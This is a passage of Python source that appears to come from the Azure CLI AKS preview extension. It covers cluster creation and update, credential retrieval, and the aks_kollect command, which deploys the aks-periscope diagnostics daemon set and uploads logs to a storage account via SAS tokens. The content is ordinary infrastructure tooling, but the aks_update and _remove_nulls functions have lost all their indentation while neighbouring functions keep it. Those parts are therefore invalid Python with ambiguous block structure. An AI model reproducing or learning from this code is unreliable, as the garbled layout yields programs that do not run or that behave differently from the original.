    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
    os_type = 'Linux'
    enable_virtual_node = False
    if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
        enable_virtual_node = True
    # --- AAD profile: managed AAD (--enable-aad) vs. legacy client/server-app AAD. ---
    aad_profile = None
    if enable_aad:
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
            raise CLIError('"--enable-aad" cannot be used together with '
                           '"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
        if disable_rbac and enable_azure_rbac:
            raise CLIError(
                '"--enable-azure-rbac" can not be used together with "--disable-rbac"')
        aad_profile = ManagedClusterAADProfile(
            managed=True,
            enable_azure_rbac=enable_azure_rbac,
            # ids -> i_ds due to track 2 naming issue
            admin_group_object_i_ds=_parse_comma_separated_list(
                aad_admin_group_object_ids),
            tenant_id=aad_tenant_id
        )
    else:
        if aad_admin_group_object_ids is not None:
            raise CLIError(
                '"--admin-aad-object-id" can only be used together with "--enable-aad"')
        if enable_azure_rbac is True:
            raise CLIError(
                '"--enable-azure-rbac" can only be used together with "--enable-aad"')
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
            aad_profile = ManagedClusterAADProfile(
                client_app_id=aad_client_app_id,
                server_app_id=aad_server_app_id,
                server_app_secret=aad_server_app_secret,
                tenant_id=aad_tenant_id
            )
    # Check that both --disable-rbac and --enable-rbac weren't provided
    if all([disable_rbac, enable_rbac]):
        raise CLIError(
            'specify either "--disable-rbac" or "--enable-rbac", not both.')
    api_server_access_profile = None
    if api_server_authorized_ip_ranges:
        api_server_access_profile = _populate_api_server_access_profile(
            api_server_authorized_ip_ranges)
    # --- Cluster identity: system-assigned vs. user-assigned managed identity. ---
    identity = None
    if not enable_managed_identity and assign_identity:
        raise CLIError(
            '--assign-identity can only be specified when --enable-managed-identity is specified')
    if enable_managed_identity and not assign_identity:
        identity = ManagedClusterIdentity(
            type="SystemAssigned"
        )
    elif enable_managed_identity and assign_identity:
        user_assigned_identity = {
            assign_identity: ManagedServiceIdentityUserAssignedIdentitiesValue()
        }
        identity = ManagedClusterIdentity(
            type="UserAssigned",
            user_assigned_identities=user_assigned_identity
        )
    # --- Optional dedicated kubelet identity (requires --assign-identity). ---
    identity_profile = None
    if assign_kubelet_identity:
        if not assign_identity:
            raise CLIError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
        kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
        identity_profile = {
            'kubeletidentity': UserAssignedIdentity(
                resource_id=assign_kubelet_identity,
                client_id=kubelet_identity.client_id,
                object_id=kubelet_identity.principal_id
            )
        }
        cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
        # ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
        _ensure_cluster_identity_permission_on_kubelet_identity(cmd.cli_ctx, cluster_identity_object_id, assign_kubelet_identity)
    pod_identity_profile = None
    if enable_pod_identity:
        if not enable_managed_identity:
            raise CLIError(
                '--enable-pod-identity can only be specified when --enable-managed-identity is specified')
        pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
        _ensure_pod_identity_kubenet_consent(
            network_profile, pod_identity_profile, enable_pod_identity_with_kubenet)
    # RBAC defaults to enabled unless --disable-rbac was passed.
    enable_rbac = True
    if disable_rbac:
        enable_rbac = False
    auto_upgrade_profile = None
    if auto_upgrade_channel is not None:
        auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(
            upgrade_channel=auto_upgrade_channel)
    # --- Assemble the ManagedCluster payload from the profiles built above. ---
    mc = ManagedCluster(
        location=location, tags=tags,
        dns_prefix=dns_name_prefix,
        kubernetes_version=kubernetes_version,
        enable_rbac=enable_rbac,
        agent_pool_profiles=[agent_pool_profile],
        linux_profile=linux_profile,
        windows_profile=windows_profile,
        service_principal_profile=service_principal_profile,
        network_profile=network_profile,
        addon_profiles=addon_profiles,
        aad_profile=aad_profile,
        auto_scaler_profile=cluster_autoscaler_profile,
        enable_pod_security_policy=bool(enable_pod_security_policy),
        identity=identity,
        disk_encryption_set_id=node_osdisk_diskencryptionset_id,
        api_server_access_profile=api_server_access_profile,
        auto_upgrade_profile=auto_upgrade_profile,
        pod_identity_profile=pod_identity_profile,
        identity_profile=identity_profile,
        disable_local_accounts=bool(disable_local_accounts))
    if node_resource_group:
        mc.node_resource_group = node_resource_group
    # --- Private-cluster / private-DNS-zone / FQDN-subdomain validation. ---
    use_custom_private_dns_zone = False
    if not enable_private_cluster and disable_public_fqdn:
        raise ArgumentUsageError("--disable_public_fqdn should only be used with --enable-private-cluster")
    if enable_private_cluster:
        if load_balancer_sku.lower() != "standard":
            raise ArgumentUsageError(
                "Please use standard load balancer for private cluster")
        mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
            enable_private_cluster=True
        )
        if disable_public_fqdn:
            mc.api_server_access_profile.enable_private_cluster_public_fqdn = False
    if private_dns_zone:
        if not enable_private_cluster:
            raise ArgumentUsageError(
                "Invalid private dns zone for public cluster. It should always be empty for public cluster")
        mc.api_server_access_profile.private_dns_zone = private_dns_zone
        from msrestazure.tools import is_valid_resource_id
        # A value other than the "system"/"none" sentinels must be a valid
        # Azure resource ID pointing at a custom private DNS zone.
        if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM and private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_NONE:
            if is_valid_resource_id(private_dns_zone):
                use_custom_private_dns_zone = True
            else:
                raise ResourceNotFoundError(private_dns_zone + " is not a valid Azure resource ID.")
    if fqdn_subdomain:
        if not use_custom_private_dns_zone:
            raise ArgumentUsageError(
                "--fqdn-subdomain should only be used for private cluster with custom private dns zone")
        mc.fqdn_subdomain = fqdn_subdomain
    if http_proxy_config:
        mc.http_proxy_config = _get_http_proxy_config(http_proxy_config)
    if uptime_sla:
        mc.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )
    headers = get_aks_custom_headers(aks_custom_headers)
    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            if monitoring and enable_msi_auth_for_monitoring:
                # Creating a DCR Association (for the monitoring addon) requires waiting for cluster creation to finish
                no_wait = False
            created_cluster = _put_managed_cluster_ensuring_permission(
                cmd,
                client,
                subscription_id,
                resource_group_name,
                name,
                mc,
                monitoring,
                ingress_appgw_addon_enabled,
                enable_virtual_node,
                need_post_creation_vnet_permission_granting,
                vnet_subnet_id,
                enable_managed_identity,
                attach_acr,
                headers,
                no_wait)
            if monitoring and enable_msi_auth_for_monitoring:
                # Create the DCR Association here
                _ensure_container_insights_for_monitoring(cmd,
                                                          addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id,
                                                          resource_group_name, name, location,
                                                          aad_route=enable_msi_auth_for_monitoring, create_dcr=False,
                                                          create_dcra=True)
            return created_cluster
        except CloudError as ex:
            retry_exception = ex
            # Only retry on the AAD-propagation error; re-raise everything else.
            if 'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile and \
not uptime_sla and \
not no_uptime_sla and \
not enable_aad and \
not update_aad_profile and \
not enable_ahub and \
not disable_ahub and \
not auto_upgrade_channel and \
not enable_managed_identity and \
not assign_identity and \
not enable_pod_identity and \
not disable_pod_identity and \
not enable_secret_rotation and \
not disable_secret_rotation and \
not tags and \
not windows_admin_password and \
not enable_local_accounts and \
not disable_local_accounts and \
not enable_public_fqdn and \
not disable_public_fqdn:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--no-uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--enable-managed-identity" or '
'"--enable-pod-identity" or '
'"--disable-pod-identity" or '
'"--auto-upgrade-channel" or '
'"--enable-secret-rotation" or '
'"--disable-secret-rotation" or '
'"--tags" or '
'"--windows-admin-password" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac" or '
'"--enable-local-accounts" or '
'"--disable-local-accounts" or '
'"--enable-public-fqdn" or '
'"--disable-public-fqdn"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if disable_local_accounts and enable_local_accounts:
raise CLIError('Cannot specify --disable-local-accounts and --enable-local-accounts '
'at the same time.')
if disable_local_accounts:
instance.disable_local_accounts = True
if enable_local_accounts:
instance.disable_local_accounts = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError(
'Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
# ids -> i_ds due to track 2 naming issue
instance.aad_profile.admin_group_object_i_ds = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise CLIError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if enable_public_fqdn and disable_public_fqdn:
raise MutuallyExclusiveArgumentError(
'Cannot specify "--enable-public-fqdn" and "--disable-public-fqdn" at the same time')
is_private_cluster = instance.api_server_access_profile is not None and instance.api_server_access_profile.enable_private_cluster
if enable_public_fqdn:
if not is_private_cluster:
raise ArgumentUsageError('--enable-public-fqdn can only be used for private cluster')
instance.api_server_access_profile.enable_private_cluster_public_fqdn = True
if disable_public_fqdn:
if not is_private_cluster:
raise ArgumentUsageError('--disable-public-fqdn can only be used for private cluster')
if instance.api_server_access_profile.private_dns_zone.lower() == CONST_PRIVATE_DNS_ZONE_NONE:
raise ArgumentUsageError('--disable-public-fqdn cannot be applied for none mode private dns zone cluster')
instance.api_server_access_profile.enable_private_cluster_public_fqdn = False
if instance.auto_upgrade_profile is None:
instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()
if auto_upgrade_channel is not None:
instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
from knack.prompting import prompt_y_n
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update the cluster to use {} managed identity.\n'
'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
user_assigned_identity = {
assign_identity: ManagedServiceIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
if enable_pod_identity:
if not _is_pod_identity_addon_enabled(instance):
# we only rebuild the pod identity profile if it's disabled before
_update_addon_pod_identity(
instance, enable=True,
allow_kubenet_consent=enable_pod_identity_with_kubenet,
)
if disable_pod_identity:
_update_addon_pod_identity(instance, enable=False)
azure_keyvault_secrets_provider_addon_profile = None
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
azure_keyvault_secrets_provider_addon_profile = instance.addon_profiles.get(CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, None)
azure_keyvault_secrets_provider_enabled = CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME].enabled
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux'].enabled
if enable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--enable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--disable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if tags:
instance.tags = tags
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
headers = get_aks_custom_headers(aks_custom_headers)
return _put_managed_cluster_ensuring_permission(cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
headers,
no_wait)
def aks_show(cmd, client, resource_group_name, name):   # pylint: disable=unused-argument
    """Fetch a managed cluster and strip often-null fields before returning it."""
    managed_cluster = client.get(resource_group_name, name)
    cleaned = _remove_nulls([managed_cluster])
    return cleaned[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd,   # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        name,
                        admin=False,
                        user='clusterUser',
                        path=os.path.join(os.path.expanduser(
                            '~'), '.kube', 'config'),
                        overwrite_existing=False,
                        context_name=None,
                        public_fqdn=False):
    """Fetch cluster access credentials and print or merge them into a kubeconfig file."""
    # Ask the service for the public-endpoint kubeconfig when requested.
    serverType = 'public' if public_fqdn else None
    if admin:
        credentialResults = client.list_cluster_admin_credentials(
            resource_group_name, name, serverType)
    elif user.lower() == 'clusteruser':
        credentialResults = client.list_cluster_user_credentials(
            resource_group_name, name, serverType)
    elif user.lower() == 'clustermonitoringuser':
        credentialResults = client.list_cluster_monitoring_user_credentials(
            resource_group_name, name, serverType)
    else:
        raise CLIError("The user is invalid.")
    if not credentialResults:
        raise CLIError("No Kubernetes credentials found.")
    try:
        kubeconfig = credentialResults.kubeconfigs[0].value.decode(
            encoding='UTF-8')
        _print_or_merge_credentials(
            path, kubeconfig, overwrite_existing, context_name)
    except (IndexError, ValueError):
        raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd,   # pylint: disable=too-many-statements,too-many-locals
                client,
                resource_group_name,
                name,
                storage_account=None,
                sas_token=None,
                container_logs=None,
                kube_objects=None,
                node_logs=None):
    """Deploy the aks-periscope daemon set to the cluster to collect logs and
    diagnostic information and upload them to a storage account.

    :param storage_account: name or resource ID of the target storage account;
        when omitted, the account from the cluster's diagnostic settings is used.
    :param sas_token: SAS token for the storage account; when omitted, a
        read/write token (valid for one day) is generated from the account keys.
    :param container_logs, kube_objects, node_logs: extra values appended to
        the corresponding DIAGNOSTIC_* lists in the periscope deployment YAML.
    :raises CLIError: if kubectl is missing, the storage account cannot be
        resolved, or deploying periscope fails.
    """
    colorama.init()
    mc = client.get(resource_group_name, name)
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    storage_account_id = None
    if storage_account is None:
        print("No storage account specified. Try getting storage account from diagnostic settings")
        storage_account_id = get_storage_account_from_diag_settings(
            cmd.cli_ctx, resource_group_name, name)
        if storage_account_id is None:
            raise CLIError(
                "A storage account must be specified, since there isn't one in the diagnostic settings.")
    from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
    if storage_account_id is None:
        # A storage account name (not a resource ID) was supplied; build the
        # full resource ID assuming it lives in the cluster's resource group.
        if not is_valid_resource_id(storage_account):
            storage_account_id = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace='Microsoft.Storage', type='storageAccounts',
                name=storage_account
            )
        else:
            storage_account_id = storage_account
    if is_valid_resource_id(storage_account_id):
        try:
            parsed_storage_account = parse_resource_id(storage_account_id)
        except CloudError as ex:
            raise CLIError(ex.message)
    else:
        raise CLIError("Invalid storage account id %s" % storage_account_id)
    storage_account_name = parsed_storage_account['name']
    readonly_sas_token = None
    if sas_token is None:
        # No token supplied: derive both a read/write token (for periscope to
        # upload) and a read-only token (for the URL shown to the user).
        storage_client = cf_storage(
            cmd.cli_ctx, parsed_storage_account['subscription'])
        storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
                                                                         storage_account_name)
        kwargs = {
            'account_name': storage_account_name,
            'account_key': storage_account_keys.keys[0].value
        }
        cloud_storage_client = cloud_storage_account_service_factory(
            cmd.cli_ctx, kwargs)
        sas_token = cloud_storage_client.generate_shared_access_signature(
            'b',
            'sco',
            'rwdlacup',
            datetime.datetime.utcnow() + datetime.timedelta(days=1))
        readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
            'b',
            'sco',
            'rl',
            datetime.datetime.utcnow() + datetime.timedelta(days=1))
        readonly_sas_token = readonly_sas_token.strip('?')
    from knack.prompting import prompt_y_n
    print()
    print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
          f'save them to the storage account '
          f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
          f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
    print()
    print('If you share access to that storage account to Azure support, you consent to the terms outlined'
          f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
    print()
    if not prompt_y_n('Do you confirm?', default="n"):
        return
    print()
    print("Getting credentials for cluster %s " % name)
    _, temp_kubeconfig_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name,
                        name, admin=True, path=temp_kubeconfig_path)
    print()
    print("Starts collecting diag info for cluster %s " % name)
    sas_token = sas_token.strip('?')
    # Pull the periscope deployment template and inject the (base64-encoded)
    # storage account name and SAS key into its placeholder comments.
    deployment_yaml = urlopen(
        "https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
    deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
                                              (base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
    deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
                                              (base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
    yaml_lines = deployment_yaml.splitlines()
    for index, line in enumerate(yaml_lines):
        if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
            yaml_lines[index] = line + ' ' + container_logs
        if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
            yaml_lines[index] = line + ' ' + kube_objects
        if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
            yaml_lines[index] = line + ' ' + node_logs
    deployment_yaml = '\n'.join(yaml_lines)
    fd, temp_yaml_path = tempfile.mkstemp()
    temp_yaml_file = os.fdopen(fd, 'w+t')
    try:
        temp_yaml_file.write(deployment_yaml)
        temp_yaml_file.flush()
        temp_yaml_file.close()
        try:
            print()
            print("Cleaning up aks-periscope resources if existing")
            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "serviceaccount,configmap,daemonset,secret",
                             "--all", "-n", "aks-periscope", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)
            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRoleBinding",
                             "aks-periscope-role-binding", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)
            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRoleBinding",
                             "aks-periscope-role-binding-view", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)
            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRole",
                             "aks-periscope-role", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)
            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "--all",
                             "apd", "-n", "aks-periscope", "--ignore-not-found"],
                            stderr=subprocess.DEVNULL)
            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "CustomResourceDefinition",
                             "diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)
            print()
            print("Deploying aks-periscope")
            subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
                                     temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            raise CLIError(err.output)
    finally:
        os.remove(temp_yaml_path)
    print()
    # Periscope uploads under a container named after the cluster FQDN with
    # dots replaced by dashes; build the user-facing URL for that container.
    fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
    normalized_fqdn = fqdn.replace('.', '-')
    token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
    log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
                              f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
    print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
    print()
    # BUGFIX: corrected user-facing typo "Stroage" -> "Storage".
    print(f'You can download Azure Storage Explorer here '
          f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
          f' to check the logs by adding the storage account using the following URL:')
    print(f'{format_hyperlink(log_storage_account_url)}')
    print()
    if not prompt_y_n('Do you want to see analysis results now?', default="n"):
        print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
              f"anytime to check the analysis results.")
